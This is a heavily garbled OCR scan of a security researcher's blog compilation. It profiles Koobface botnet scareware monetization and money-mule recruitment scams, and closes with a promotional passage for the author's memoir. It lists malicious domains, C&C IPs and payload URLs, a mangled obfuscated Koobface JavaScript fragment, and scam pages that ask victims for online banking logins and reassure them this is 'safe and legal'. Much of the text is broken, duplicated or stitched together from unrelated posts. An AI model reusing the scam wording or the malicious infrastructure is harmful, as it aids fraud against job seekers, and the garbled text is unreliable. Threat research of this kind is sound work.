Corpoece Terenas Gone ane OTT DEBAeren WU (TTA) 5 
a ogre ane bermoeoue werane? (TA) BL) $25.00 nen 
So0rs Ba OTT EENE WED Nepesewe WU ITA) $25.00 I 
Copmes (Ae Ganmoncnmn fet ared © Meancarecs 
Se Bark Cetads Form BAN (E¥G) $25.00 © Ormcence 
Bare Cetats Form (aul) (ENG) $25.00 
Undpoeeee romapee Bark Detats Form KAY (ENG) $25.00 
(Bark Cetats Form Ax) Gi) $25.00 


sesean ton 
CDatene Sronin, eatlncre 


Jargon, samanere, PpELYRPS RS emee 


2arOOK md Beubirey ID $30.00 ~- Lao qpadameed 
Aarons B00 mp Beabirey OMLDE wocTyTe x Cutty (WORLDWIDE) EN) $25.00 Gi | 

= POO ma OTANI ferdmec cueT# EN) $50.00 FR ao 

BOOK ns OTTOBEMEWE Wire Tranter (V5) (ORE/SPLIT) $0 0) c 
I OO ohecnerwe ne Bebiy mempOEErO NT 08 Lhe AO $20.00 Rrasdisqntnnan 
Tao Package Inapecton Form (EX) (WORLDWIDE) (.000) $35.00 © acandO pee! 
as Package Irapecton Form (9) (WORLDWIDE) (SOF) $20.00 fore oreeroe: 24 
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assurity-groupinc.cn 
cosco-groupli.cn 
mx.cosco-groupli.com 
mx.puritan-groupco.cn 
mx.puritan-groupinc.com 
mx regency-groupnetcc 
mx.transgroupmain.cn 
ns1.dummykeath.ce oo 
nsl.theblackend.cn ; . 
puritan-groupco.cn 
puritan-groupinc.com 
redeye-groupco.com 
regency-groupnet.ce 
rengo-groupmain.com 


stock-groupmain.cn 


transgroupmain.cn 


[30] 


222.35.136.0/21 ——4S-ge As38356 
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cosco-groupmain.com 
entrust-group.ce 
focus-groupsve.cn 
invalda-groupli.cn 
mx.armor-groupco.cn 
mx.cosco-groupmain.com 
mx.invalda-groupli.cn A O 2223513728 > NET 
mx.melson-groupli.cn 
mx.rengo-groupmain.com 
mx.vector-groupfine.cn 
total-groupco.cn 
vector-groupfine.cn 


westlawchina.com 
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222.35.136.0/21 ——“S-g» 4s38356 


adina groupnetcom 


aina proupsv cc 


aharce groupmain cc 


annuity groupie com 


ertusigrsup cn 


heme -gteupsyt com 


Mena Qroupsye com 


fro afine growpave cc 


mmo anrraty-proupmet cc 


Mma lime groupsve com 


Mma mena-groupser com 


Mma preme-prsupre.cn 


fx priMe-grovpinc cn 


Mra re deye-groupco cn 


Mu redeye-growpco. com 


MOL PeQENcy-roUpre Com 


Mu SCOpe Grouprmain cc 


movtrans growpmain cn 


mmatrans-groupmain com 


Grime-growpco.cn 


brime-growpine cn 


peespera-groupent cn 


feSeye-growpro cn 


fegemy growpco com 


Tans groupmain cn 


vision: greupswe. com 
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affina-groupsve.cn 


annuity-groupnet.ce 


: A 
annuity-groupnet.cn 
criscom-group.cc 
A 
mx.annuity-groupnet.cn 
mx.prime-groupco.com 
mx. scope-group.cn 4 


mx.vision-groupinc.cn 


nsl.bubble-preorderinto 


nsl.diamond-dream,cc 


ns L.totallysmiled.cn 


stock-groupmain.cc 


totalgroupinc.cn 


vision-groupinc.cn 
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6. http: //garwarner .blogspot . com/2009/09/koobface-wrecks-search-results.htm 
7. http: //ddanchev. blogspot .com/2009/04/confickers-scarewarefake-security.htm 


8. http: //ddanchev. blogspot .com/2009/06/from-ukrainian-blackhat-seo-gang-with.htm 
9. http: //ddanchev. blogspot .com/2009/06/from-ukrainian-blackhat-seo-gang-with_09.htm 
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16. http: //ddanchev.blogspot .com/2009/07/diverse-portfolio-of-fake-security_27.htm 


17. http://www.virustotal.com/analisis/fc49e1fb731ae959262b2237494e0cd39e1c5399f 4fd56a1e40276053a0e693f- 12531 
8. http: //www.virustotal.com/analisis/9c23d2c48bc5912869f 2ccee1c£87 98cb8b9F 466996c96538546c7466ae7 10ef - 12530 
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22. http: //ddanchev. blogspot .com/2009/08/movement- on-koobface-front-part-two.htm 

23. http://ddanchev. blogspot .com/2009/08/movement-on-koobface-front .htm 

24. http: //ddanchev. blogspot .com/2009/07/koobface- come-out-come-out-wherever-you.htm 
25. http: //ddanchev. blogspot .com/2009/07/dissecting-koobface-worms-twitter .htm 
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. http: //ddanchev. blogspot . com/2008/12/koobface- gang-mixing-social-engineering.htm 
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affina-groupnet.cn 


annuity-grouplic.cn 


entrust-groupsve,.en 


melson-groupli.cn 


mx atina-groupnet.cn 


mx.annuity-grouplic.cn 


mx.extreme-groupinc.cn 


mx. massive-groupsve.cn 


mx puritan-groupinc.cn 


mx totalgroupine.cn 


nsl.reddbutton.cn 


nsl.windcontrol.cc 


prime-groupco.com 


puritan-groupine.cn 


regency-groupnet.cn 


scope-groupmain.cn 


trans-groupmain.com 
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Tureen grouse in et or 2223510727 > Cape 22235128021 ——thge astiss 


(TION Grove ret (Cn 


os] Ae commence 


fal gemiouspatmerce 
rere Groepenc Ce 
prosperagroupint OF 
seteye grouper ce 
redeye groupie om 


fepENty grevEso OF 
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By otner aetaits 


@ Analysis of the file resources indicate the following possible country of origin: 


=| Russian Federation 


@ The HOSTS file was updated with the following URL-to-IP mappings: 


www. bobbear.co.uk 
bobbear.co.uk 
reed.co.uk 
seek.com.au 
scam.com 
scambusters.org 


Sanches: bibgepoes 


aic.gov.au 
google.com.au 


0. 
0. 
0. 
0. 
0. 
0. 
0. 
0. 
0. 
0. 


PRP PRP RRP RP RP Re 


-0. 
-0. 
-0. 
«0. 
-0. 
a 
-0. 
0. 
-0. 
~@. 


All content (“Information”) contained in this report is the copyrighted work of Threat Expert Ltd and its associated companies (“ThreatExpert”) 
ThreatExpert. 
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QWOCENO. IN 


THANK YOU FOR YOUR BUSINESS 
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5.9.7 Koobface Botnet’s Scareware Business Model (2009-09-16 20:45) 


S* Video + Upload © Record 


Welcome to Video 


share your prrional vxdcou 


Sv crd cond seed vate erase 


Pudiah vateos from your mobée 


Build your 
Latest Videos Recently Tagged Friends credit now 
Capital One Classic 


Seu card to rebuild 
your credit rating 


am a 


Vanquis Visa 


Flexible acceptarce 
criteria 


39. _, 


Totallys 


El kate we Mae *| Le Chet (0 8 


UPDATE1: TrendMicro just confirmed the ongoing [1]double-layer monetization of Koobface. 
Meanwhile, the gang is rotating the scareware domains with new ones pushed by popup.php, 
followd by two recently updated Koobface components. 


The [2]new scareware domains kjremover .info; Irxsoft .info - 212.117.160.21 - Email: 
niclas@i.ua actually [3]download it from the well known q2bf0fzvjb5ca .cn portfolio, which 
phones back to the same domains listed previously, with only a slight change in the filename 
- urodinam .net/8732489273.php. The generic detection rate for the updated components 
(61.235.117.83 /bin/[4]get.exe; 61.235.117.83 /bin/[5]v2webserver.exe) with get.exe phoning 
back to a domain parked at the takedown-proof, China-based 61.235.117.83, in particular 
gdehochesh .com/adm/index.php. 


Just like Conficker, the [6]Koobface botnet is no stranger to the [7]scareware business 
model and the potential for monetization of the hundreds of thousands of infected hosts. 
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ITALIANO 


-erfect Finance Conditions 


_-« 
iT P Cc are Provided” 


no corporate risk management 


This 65 @35y Job. but your help ts very important for us and cur cherts 
This job does not require any special education This }o6 wouldn? bang you millions. we do not suggest huge earnings 


You wouldnt have look clents for us or sell cur production You wouldnt have to pay us for talang you on cur Est However we 
Quarantece statie income 


Posibor: Financal Representative 

Department: Financal Management 

Satary- $ 3,000 per month + 5% from each operation 

Sumrenery 

Receive payments fom customers in your area help to acteeve Snancal otjectves 
Condisons of work 


Workin Prough Me internet office. at50 wih Danks and raped Dansfers systems 


You will Need NO Money to star I you wart to apply Please SENd you resume to indhnduaipectiecapdaly cups Gooogiemad Com 


home | about us | services | careers | contacts | login 


Individual People Capital Groep © 2008 | Privacy pokey 
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“Perfect Finance Conditio 


_— 
I PC are Provided” 


no corporate risk management 


yA Welcome to indvica Pecote Capstal Geoup 


The individual Peopie Capital Group Companies is one cf the world’s most experienced and successfé investment management 
orpanizatons Our companies manaze investments tor mahons of indevduals and Prousands of corporabons and instiubors 


The inchecual Peogie Cagdtal Croup’s largest compenents are 

+ in@vidual People Funds which ranks among the Pree largest mutual fund fammes in he US - managed by Inceudual People 
Capt Research and Managemert Company wih assets unde! management of more Mian $750 Dabon 

+ nauidual Pecole Captal Guardian Trust Company and he Nawaua Pecole Capea Intermabonal comparees — providers of 
obal nvestnent management serices for NsBRGonal Cents, CONSLBANTS ated Indhaduals. wih assets under management of 
ador om atety $30) babon 

For 75 years. we have followed a consistent phdoscoty and approach to generate Comsistert long-term investnent results for our 
investors around he world AL the Nean of ou success ts a Commmamert to a number of core bebefs: he importance of long-term 
inwestng. He valve of iIn-deph global research adherence to 3 Gsaplined investment managemert ptwbosophy. and a code of 
efics that emphasices Nonesty and integety 


honse | about us | services | careers | contacts | login 
Individual People Capital Groep © 2008 | Privacy policy 
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BRAND IMAGE 


advertising agency 


agences you decided to choose “Brand Frage”. We are Geighted to 


@ InTRODUCTION > OURSERVICE 
R's 2 great pleasure for us that out of 3 great ammount of advertizing 
Gragtes denign 


Tew you wart to get from your PR-carmpaign. On the advertising products... 


adverteng & one of these 
We were created to help you mn seling products and services. “Brand ad 
rage” typically atherots to asset you n buking your brand by The advertaing “Band 


agency “Brand * Clearly understands the man pencoles of brand 
name and wil be gad to heb you n choosing the nght rame for your The & possibly one of the most 
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QWOCENO. IN 


THANK YOU FOR YOUR BUSINESS 
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INFORMATION COWPENSATION WCREASE 


DETAILS HOURS 
“SS SYSTEM 
we COMMISSION 


“or TRANSPER 2 = 


“= FINANCIAL amon mi 
“ACCOUNT = "" 


meee WNOIGE ee PROVIDED socumecy LEGAL 
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New basin activity 
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Employee Registration - Step 4 


@=@20°O020 


I confirm that I have contacted my bank directly and verified that: 


oO my banking information (Account and Routing numbers) are correct. 
(J my daily withdrawal limit is in fact $10,000. 
(]_ my current account listed is active, as it may become inactive due to inactivity. 


oO my account is able to receive funds on daily basis in the amount of $10,000. 


In addition I certify that: 


oO there is a branch of my bank located in my city/tovm and I am able to get there soon after task 
receipt. 


oO there are Western Union and Money Gram locations in my city/town and I am aware of their exact 
addresses. 


Next Step Back 


*If you have any doubts or concerns to the above statements. please post-pone your registration until all of the information is 
verified. You carry full liability for providing falsified information. 


**Please bear in mind the Confidentiality Clause in your Agreement when contacting outside parties for information. 


Group Inc 
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I'm feeling uncomfortable giving you my online banking details. Why do you need it? I'm worrying about unauthorized access to my 
bank account. 


We require online banking access to monitor deposits coming from our clients. It saves you much time and increase your rating in our 
system: 


- There is no need to check your bank account every hour during transactions, your personal supervisor will do it instead of you! You'll be informed 
the same minute funds arrive 

- No need to send us your bank account statement every week (maybe 2-3 times a week) 

- We trust you much more, you'll receive money bonuses and more transactions! 


It is absolutely safe and legal. We guarantee that all persona! details will stay safe. Please read our Privacy Policy. NOTE: IT'S 


IMPOSSIBLE TO MAKE ANY TRANSFERS USING ONLINE ACCESS. If you have no online access to your bank account, you should contact 
your bank and activate this service. It will take less than 10 minutes. 


Online Banking Details 
URL: http:// 


Login: 


Password: | 1] 


NextStep Skip ThisStep Back 


* At this moment we require online access to your bank account optionally but strongly recommend to apply with online banking 
details. NOTE: 


@ agents with online access will have higher priority on getting new tasks (amounts are also larger) 
® agents with online access receive $100 BONUS to base salary every month 
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Why are you gathering so much information about applicants? Such attention especially to bank account details puts me on guard. 


In fact that modern financial system is a complex instrument, which controls financial streams. The problem is that any transfer may 
be delayed (from 1 to 5 days) but it is unacceptable for our business. Transaction should be completed by a financial manager the 
same day money is deposited into the bank account. Othervise, we risk to lose money, clients, reputation. Analyzing all the details 
below we'll be able to prepare tasks for every agent individually. Please fill in all the fields carefully to avoid delays while working with 
your bank. The success of our cooperation depends on the accuracy of entered details! Please be serious. 


“You are responsible for reliability of this information. If you're having any difficulties please contact your bank, 


Banking Details 
Account Type*: Sacral ] 
ee ___— 
Account Type (checking/saving)*: - select - | 


name on the Account [_—*S’P. 
Account Number*: Eas | 
Routing Wumberforact transfer: [dP 
ae 
Transfer*: 

Date you cpened yourbanke accounts [S«dP 
ee 
account?*: 

average amount ofeach operatonts [i 
ist» prepaid account C____—_}? 
—— 
counter™: 

ee a EL 
Union/Money Gram?*: 

al | 
area?™: 
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Corporate Finance 
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Trust Management 
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Read more 
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However, changes made in the campaign structure of the Koobface botnet during the 
last couple of days, indicate that the Koobface gang has embedded a pop-up at each and 
every host that’s automatically rotation different scareware brands. They’re now officially 
monetizing the botnet using a scareware business model. 


Let’s analyze the latest changes introduced by the Koobface gang over the last couple 
of days and emphasize on the monetization tactics introduced by the gang. 


// KROTEG | Weparest » JavaScript Report for Mite: //90.40.104. 1600cEas 
var pjirxkbds = [ 


{' fubar.com’, 
-¢ 


i; 
var wnifextduveylepjqo = [ 
*90.40.164.169', 
'66.106.61.148', 


var . 
var roatjfdxe ges = val | cbwrux6é+' ume’ 6¢'nt.c' eryvgpmSe'efer' +ycmgfseajrkihwxpovbuz+'rer’), uojdpitksbal0 = ‘'; 
for (var vszrepor c% z < wszeporltvcxartjs ++ 

t= =1)) ( 


Stw: 
+ pjiexkbdS[vseeporitvexntj35) (1): 


[8]Next to [9]Jinsulting, showing [10]gratitude, the [11]Koobface gang also has a (black) sense 
of humor - within one of the directories at the takedown-proof command and control used 
by the gang in China ([12]61.235.117.83; at 61.235.117.83/bin in particular) they’ve left the 
following message "2008 ali baba and 40, LLC". [13]Ali Baba and the Forty Thieves is a 1944 
film based on the original [14]Ali Baba character. 


Compared to previous campaigns relying on centralized command and control and redirection 
points - making them easy to shut down - the ongoing Facebook campaigns are dynamically 
redirecting to IPs within the Koobface network, which combined with their use of compromised 
legitimate sites is supposed to make the take down of their campaigns a bit more time 
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assurity-groupinc.cn 
cosco-groupli.cn 
mx.cosco-groupli.com 
mx.puritan-groupco.cn 
mx.puritan-groupinc.com 
mx regency-groupnetcc 
mx.transgroupmain.cn 
ns1.dummykeath.ce oo 
nsl.theblackend.cn ; . 
puritan-groupco.cn 
puritan-groupinc.com 
redeye-groupco.com 
regency-groupnet.ce 
rengo-groupmain.com 


stock-groupmain.cn 


transgroupmain.cn 
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cosco-groupmain.com 
entrust-group.ce 
focus-groupsve.cn 
invalda-groupli.cn 
mx.armor-groupco.cn 
mx.cosco-groupmain.com 
mx.invalda-groupli.cn A O 2223513728 > NET 
mx.melson-groupli.cn 
mx.rengo-groupmain.com 
mx.vector-groupfine.cn 
total-groupco.cn 
vector-groupfine.cn 


westlawchina.com 
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adina groupnetcom 


aina proupsv cc 


aharce groupmain cc 


annuity groupie com 


ertusigrsup cn 


heme -gteupsyt com 


Mena Qroupsye com 


fro afine growpave cc 


mmo anrraty-proupmet cc 


Mma lime groupsve com 


Mma mena-groupser com 


Mma preme-prsupre.cn 


fx priMe-grovpinc cn 


Mra re deye-groupco cn 


Mu redeye-growpco. com 


MOL PeQENcy-roUpre Com 


Mu SCOpe Grouprmain cc 


movtrans growpmain cn 


mmatrans-groupmain com 


Grime-growpco.cn 


brime-growpine cn 


peespera-groupent cn 


feSeye-growpro cn 


fegemy growpco com 


ans groupmain cn 


vision: greup swe. com 
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affina-groupsve.cn 


annuity-groupnet.ce 


: A 
annuity-groupnet.cn 
criscom-group.cc 
A 
mx.annuity-groupnet.cn 
mx.prime-groupco.com 
mx. scope-group.cn 4 


mx.vision-groupinc.cn 


nsl.bubble-preorderinto 


nsl.diamond-dream,cc 


ns L.totallysmiled.cn 


stock-groupmain.cc 


totalgroupinc.cn 


vision-groupinc.cn 
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affina-groupnet.cn 


annuity-grouplic.cn 


entrust-groupsve,.en 


melson-groupli.cn 


mx atina-groupnet.cn 


mx.annuity-grouplic.cn 


mx.extreme-groupinc.cn 


mx. massive-groupsve.cn 


mx puritan-groupinc.cn 


mx totalgroupine.cn 


nsl.reddbutton.cn 


nsl.windcontrol.cc 


prime-groupco.com 


puritan-groupine.cn 


regency-groupnet.cn 


scope-groupmain.cn 


trans-groupmain.com 
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consuming. 


Protection leve 


my Salety Ce * | Select application 


License error! 
Spyware scanner 


f¥. 
vee 
'r 


The license control center has 
detected an outdated or unknown 
software license. 


Surfing protection 


Database update error! a 


The database is out of date. Some Cookies remover 
components are not working — 


correctly. Update your software 
immediately! 


Registry doctor 


“a 


Security under threat! zx 


The component providing security 
has detected a critically low level 


of protection. Make sure that all Firewall 


That’s, of course, not the case since undermining their monetization approaches undermines 
the monetary value of their campaigns, which is what they’re after this time. The Koobface 
gang has now embedded a single line within each and every infected host used in the 
campaign, in order to not only attempt to infect new visitors with the Koobface malware itself, 
but to also trick them into installing the scareware which is rotated as usual. 


dangerWindAdr = 61.235.117.83/ popup.php loads on each and every Facebook spoof 
page part of the botnet and is then redirecting the most popular scareware template, the My 
computer Online Scan. 
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Why & Panama so attractive Our Services areers Join us 


Pantin Real Estate 


Penta Real istate. 


Pre COMET UCTION, Sales + esshes 


Fnaecing, 
Poy for you Parvwene proper? 


Serves © Penama 


Parkin Rew Estate wil consut y POOR BND OTE EY SON ONE OL ARON maTIENS 10 he pan Te 


f Parner emerce ge 


Partn Real Estate provides the best mdhvdusl serve ard an excuse ty of Panama resting o its real estate purchase. We offer 
you s professonst legal, franca, mmc phon and retocaton serve omereherave guded Panama real estate tours n at 
languages, me prapote our certs a compere service hat mil make ther Dynan reg existe meres much rere stractve and effomt 
Ths county m Central Amerca q named the works’: number one for retirement and second for home destination. The government of Panama 
prowdes Lirstve opporturites for muestment in property. We can propose you a beachtont reaity n Panama, sland property, selectors m 
the Peart Islands, and much more. Wie aio propose # great varety of Params condommums m Panama City best areas and troughout the 
country on your choce. Vth the recent expanson of the Panama Canal, major foregn mverimert sre revested sgvicanty ard there a 
floret Grate for tore ndaty ceated mn he conty Ow it @ time to take the appeared advantage of the real estate and many 
other oppor turvtes of tha rapdly developing 

pemdes the property and touram, Params i er he port a: a franca cme of Amencan Content, and a often called the Late 
American Seitzerianc”. There are more than 320 icersed fran E wath the extemety rgd prvacy lant 
they compose an offshore barking parade and offer mary advantage: : ° tate Pvestng and ance 
protecton. Panamanan corporate law offers many legal 


[nis copy 90 DU Crate Panama property mal ad Gear land rept y SysIO® ut makes vertyng eb tS Os mle 


25 to Become ay { Params Oroperty a6 hive pou lever bil online IT doesn} matter where yo. 9 0) have a Params 


Wid0 | F) ROUIVLEINS, whereever Whe Oty, OF a beadhont one, Pandy Real Nas oat Peaue 


Perens and to find ot how Panin Real Estate can help yon Params property purpose 


Why m Panama so attractive 


Panin Real tvtate 
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ABOUT US SERVICES CAREERS PARTNERS PRIVACY CONTACTS 


out: $B Sercce 


WE ARE RECRUITING 
PERFECT JOB 
FOR 


CPi ts Bets oe CORTES NEWS @ 


@ i rxcay, thay 451, 2009 
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@ MY MONEY 


Base salary: 2300 USD 

Commission: 8% 

Money from tasks (including charges): 800 USD 
Charges: 1200 USD 

Compensation (added to total base salary): 900 USD 
Bonus: 0 USD 

Total Base salary you'll receive: 3200 USD 

Days for salary: 30 
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CG) VIEW MESSAGE 


Message From/Date (GMT)> Message Text> | Reply» | Trashy | 


Supervisor Welcome! 

09.01.2009 18:49:39 Dear John Blackmore. 
We welcome you 4s 8 new employee. Reply Trash 
Sincerely, 


Personnel Supervisor 
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Oo COMPLETED TASKS 


09.01.2009 
@ Transaction 126357 te146is0 © Comment by Admin 


09.01.2009 
Transaction 136360 
a High Varaslane No comment 
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Western Union orders details > 


Transfer type: Western Union 
First Name: 

Last Name: 

City: 

Country: 

Reference Number (MTCN)*: 

Western Union fee (USD)*: 


Employee details > 


First Name*: John 


Last Name*: Blackmore 


City*: New York 
Country*: United States 


Comments: 


[79] 
@ COMPLETE TASK 


@ Transaction 136357 Open op ousoue Comment by Admin 


Further instructions > 


Dear John Blackmore, 
We are glad to inform you about new task! Please review transfer details: 
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(o) MY TASKS 


& Transaction 136957 NE ageno © comment by Admin 
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You have new message. Read a John Blackmore 


Tasks | Messages | My money | My Profile | Documents | Officialinvoices | Help | Quit 


Stay tuned! 


1. https: //blogger .googleusercontent . com/img/b/R29v22x1/AVVXsEjy1daGG6r1 6hdNALQVKBSMGBAWHY iWK91 YBksMa0S31WHb4 
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3. https: //blogger .googleusercontent . com/img/b/R29v2Z2x1/AVvXsEhjOXoasQhG5m0adZj 9K7Xg4tWIPgzAnR_41VZr0pX1q00Ks 
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The first scareware domain used in the last 48 ryacleaner .info/hitin.php?affid=02979 
(212.117.160.211 parked there as also eljupdate .info Email: niclas@i.ua and dercleaner .info 
Email: niclas@i.ua) was serving setup.exe which is downloading the actual [15]scareware 
executable from mt3pvkfmpi7de .cn/get.php?id=02979 (220.196.59.23). 


What’s so special about this domain? It was last profiled in the [1L6]A Diverse Portfolio of Fake 
Security Software - Part Twenty Three with the entire portfolio of .cn domains parked at the 
same IP registered under the same email - robertsimonkroon@gmail.com. 
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18.10.16 People’s Information Warfare vs the U.S DoD Cyber Warfare Doctrine - An 
Analysis (2022-10-26 12:58) 


[1] 
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CHINESE MILITARY 
INFORMATION WARFARE 
DOCTRINE DEVELOPMENT 
1994 - 2016 


PEOPLES LIBERATION ARMY 
INFORMATION WARFARE 


WILLIAM 
HAGESTAD II 


Folks as it’s been a while since I’ve last posted a high-quality post please bare with me while | 
take the time to catch up with some of the latest developments worth posting an article about 
and while | try and do my best to return to the usual blogging rhythm typical for me and for the 
readers who truly know me and appreciate my work and research | sincerely hope that you'll 
find this post informative enough and share it. 


The best is yet to come. 


What’s the main difference between a people’s information warfare concept including the U.S 
DoD cyber warfare doctrine in today’s modern world? 


We cannot discuss these if we don’t compare their cyber warfare approaches next to one an- 
other. It’s rather ironic situation, since China has built its cyber warfare doctrine based on the 
research conducted into the topic by U.S military personnel. At a later stage, Chinese military 
thinkers perceived the combination of Sun Tzu’s military strategies in the virtual realm. 


The left hand never knows what the right one is doing, 
Capability matching vs threat acquisition? 


China’s already reached the unrestricted warfare stage, a phrase when its hacking capabilities 
empowered Internet users self-mobilize themselves, the U.S DoD is implementing its cyber 
warfare doctrine, and the rest of the world is whining for yet another password stealer for 
online games that’s phoning back to China. 


A little less conversation, a little more action "babe". 
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Now that’s its becoming increasingly clear that cyber jihad is entering into a "stay tuned for a 
webcast with your favorite terrorist" stage, what we may witness next is terrorist on sand-proof 
Segways. Cutting the sarcasm, it’s becoming boring the listen to the same song played on a 
different media device. 

Stay tuned! 


1. https: //blogger . googleusercontent. com/img/b/R29vZ2x1/AVvXsEjNBK21gLER7RgM_VT1wz0NJk_NbRPpCK17s3Elns2LKgZTv 
9H-KQaaNTCVm3RalIwjwkvks07Si_IeOYv87QPTkil_36X_7akzV8xw 


18.10.17 Cyber Intelligence - Personal Memoir - Grab a Copy Today! (2022-10-26 13:00) 


Cyber Intelligence - Free PDF version [2]here. 
Copyright © 2021 by Dancho Danchev 
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Second Edition 


All rights reserved. No part of this publication may be reproduced, stored or transmitted in any 
form or by any means, electronic, mechanical, photocopying, recording, scanning, or otherwise 
without written permission from the publisher. It is illegal to copy this book, post it to a website, 
or distribute it by any other means without permission. 


Welcome to the wonderful world of cybercrime research threat intelligence gathering and se- 
curity blogging. 


[3] 


This is Dancho Danchev (https://ddanchev.blogspot.com) and I’m proud to let you know that 
I’ve finally managed to release my personal memoir which basically details my story as a 
hacker enthusiast during the 90’s up tp present day where I’m an internationally recognized 
cybercrime researcher security blogger and threat intelligence gathering analyst that’s running 
one of the security industry’s most popular security publication which is my personal blog 
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since December, 2005 when | was studying in the Netherlands while working anad running the 
infamous - https://astalavista.com portal where | was busy acting as a Managing Director and 
where | was primarily responsible for managing the Security Directory and the Security News 
sections including the production of the Security Newsletter where | was busy featuring an 
exclusive and never-published before security interview with a key individual from the Scene 
and the security industry on a monthly basis. 


Table of Contents 

Introduction 

Dedication 

Foreword 

Biography 

Special Thanks 

Testimonials 

My Personal Blog 

The Hacker Enthusiast Years - The 90’s 
Early Stage Career - The 90’s 
OSINT Career Experience 

Webroot Experience 
Astalavista.com Experience 
Security Interview - Part One 
Security Interview - Part Two 
Lovely Horse Participation 
Koobface Investigations 

Bonus Content - Visiting GCHQ 
Interpol Conference Visit 

RSA Europe 2012 Conference Visit 
InfoSec 2012 Conference Visit 
Bonus Content - ZDNet Articles 
Bonus Content - Webroot Research 
Bonus Content - WhoisXML API Research 


Dear readers, 
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This is Dancho and it’s a pleasure and an honor to introduce you to my personal E-Book in- 
cluding paperback memoir which aims to details my story as a hacker enthusiast circa the 
90’s up to present day where I’m one of the world’s most popular security bloggers threat 
intelligence analyst and cybercrime researchers internationally where I’m currently running 
one of the security industry’s most popular security publications which is my personal - Dan- 
cho Danchev’s Blog - Mind Streams of Information Security Knowledge publication which has 
managed to attract approximately 5.6M page views since it’s original start in December, 2005 
where | was studying in the Netherlands and | was busy working on and running the infamous 
https://astalavista.com portal while | busy acting as a Managing Director of the portal where | 
was busy responsible for all the content and for attracting new advertisers. 


Following a successful career as a hacker enthusiast during the 90’s and a successful man- 
agement and operation of one of the World’s leading portals for hackers and security experts 
which is https://astalavista.com for a period of three years circa 2003-2006 when | originally 
decided to launch one of the security industry’s leading publication which is my personal blog - 
https://ddanchev.blogspot.com | managed to somehow land a successful career as an indepen- 
dent contractor in the world of security blogging cybercrime research and threat intelligence 
which led me to visit several invite-only conferences including to present at event at an undis- 
closed location including to actually attract and retain approximatelly 6M page views which is 
not necessarily bad for a man one operation in terms of running and maintaining my personal 
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blog for a period of 12 years. 


[5] 


My current and past positions include: A Member to Warlndustries (http://warindustries.com) 
List Moderator at BlackCode Ravers (http://blackcode.com) Contributor Black Sun Re- 
search Facility (http://blacksun.box.sk) (BSRF) List Moderator Software Contributor (TDS- 
2 Trojan Information Database) (https://packetstormsecurity.com/files/25533/tlibrary.zip.html) 
DiamondCS Trojan Defense (http://tds.diamondcs.com.au) Contributor to LockDownCorp 
(http://lockdowncorp.com) Contributor to HelpNetSecurity (http://forbidden.net-security.org) 


A Security Consultant for Frame4 Security Systems (http://frame4.com) Contributor to 
TechGenix’s WindowSecurity.com (http://www.windowsecurity.com/authors/dancho-danchev/) 
Technical Collector - LockDownCorp - (https://lockdowncorp.com) Managing Director - 
Astalavista Security Group - (https://astalavista.com) Security Consultant - Wandera - 
(https://wandera.com) Threat Intelligence Analyst - GroupSense - (https://groupsense.io) Se- 
curity Consultant - KCS Group Europe - (https://kcsgroup.com) OSINT Analyst - Treadstone71 - 
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(https://treadstone71.com) Security Blogger - Armadillo Phone - (https://armadillophone.com) 
Security Blogger for ZDNet (http://www.zdnet.com/blog/security/) Threat Intelligence Analyst 
for Webroot (https://www.webroot.com/blog/) 


Among the primary reasons for coming up with this 97 pages long personal memoir is to em- 
power fellow researchers and security experts including the general public with an in-depth 
personal account overview of my experience in the security industry’s as a teenage hacker 
enthusiast back in the 90’s today’s most popular and often cited security blogger threat in- 
telligence analyst and cybercrime researcher internationally and to present a diverse set of 
high-quality and never-published and discussed before case studies and enriched technical 
infor-mation and OSINT data on current and emerging cyber attack trends. 


The primary goal of the book would be to position my memoir as one of the most popular and 
often cited personal account of the hacking and the security Scene circa the 90’s through the 
prism of my teenage hacker experience up to present day in terms of various high-profile and 
advanced nation-state actors and malicious and fraudulent cyber attack campaigns where the 
ultimate goal would be to discuss in-depth my experience in the field of security blogging threat 
intelligence gathering and cybercrime research throughout the past decade. 


It used to be a moment in time when “sharing was caring” and with the booming Web 2.0 
enterprises and the actual concept numerous new online participants and Web 2.0 darlings 
started popping up as mushrooms another set of individuals prone to make a change an impact 
quickly emerged online potentially sharing a treasure trove of personal knowledge into the 
world of modern technologies including the very basics of information security hacking and 
cyber warfare including a newly releases and never-published before research into the area of 
cybercrime research and the actual process of profiling the bad guys onlines in terms of their 
actual campaigns and actual malicious infrastructure behind their online campaigns. 


The primary goal of the book would be to position my memoir as one of the most popular and 
often cited personal account of the hacking and the security Scene circa the 90’s through the 
prism of my teenage hacker experience up to present day in terms of various high-profile and 
advanced nation-state actors and malicious and fraudulent cyber attack campaigns where the 
ultimate goal would be to discuss in-depth my experience in the field of security blogging threat 
intelligence gathering and cybercrime research throughout the past decade. 


It used to be a moment in time when “sharing was caring” and with the booming Web 2.0 
enterprises and the actual concept numerous new online participants and Web 2.0 darlings 
started popping up as mushrooms another set of individuals prone to make a change an impact 
quickly emerged online potentially sharing a treasure trove of personal knowledge into the 
world of modern technologies including the very basics of information security hacking and 
cyber warfare including a newly releases and never-published before research into the area of 
cybercrime research and the actual process of profiling the bad guys onlines in terms of their 
actual campaigns and actual malicious infrastructure behind their online campaigns. 


Following a series of messages left on the actual C &C (Command and Control) server locations 
which were basically greeting me and referencing my research at the time including a series 
of typosquatted domains using my name at some point in time | managed to actually come up 
with a proper “Top 10 Things You Didn’t Know About the Koobface Gang” article for ZDNet at 
the time wheret the botnet masters actually left a message within the C &C (Command and 
Control) server location basically answering the key points on a point by point basis which was 
quite a success at the time of monitoring and tracking down the Koobface botnet. 


The primary purpose behind the actual release of my personal memoir is to reach out to to a 
new set of audience and actually elaborate more on my experience and expertise in the field 
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including to offer a God’s Eye perspective on the current and emerging cybercrime ecosystem 
in combination with active case studies and technical material whose purpose is to greatly 
assist everyone that’s reading this memoir with the idea to provoke you to share it with your 
friends and colleagues including to actually recommend it to your friends and colleagues. 


| wanted to take the time and effort to dedicate this book to my ex-girfriend circa the 90’s 
Yordanka Ilieva with whom | worked on the infamous https://astalavista.com where | had the 
privilege to work on the infamous Astalavista Security Group Security Newsletter and received 
the necessary support and guidance in the context of making this high-quality security publi- 
cation happen including everyone in the U.S that | know and have worked with in the context 
of fighting cybercrime where | wanted to say big thanks to everyone who ever approached me 
and said “keep up the good work” and “keep it coming” in the context of motivating me to 
continue doing my research and continue to publish high-quality research articles and proper 
cyber threat actor attribution research and analysis including the following people: 


- lvan Schmid - for being the coolest boss ever in the world and for welcoming me on board at 
one of the Web’s most popular Web site for hackers circa 2003-2006 where | had the privilege 
to work as a Managing Director of the portal with my ex-girlfriend circa the 90’s - Yordanka 
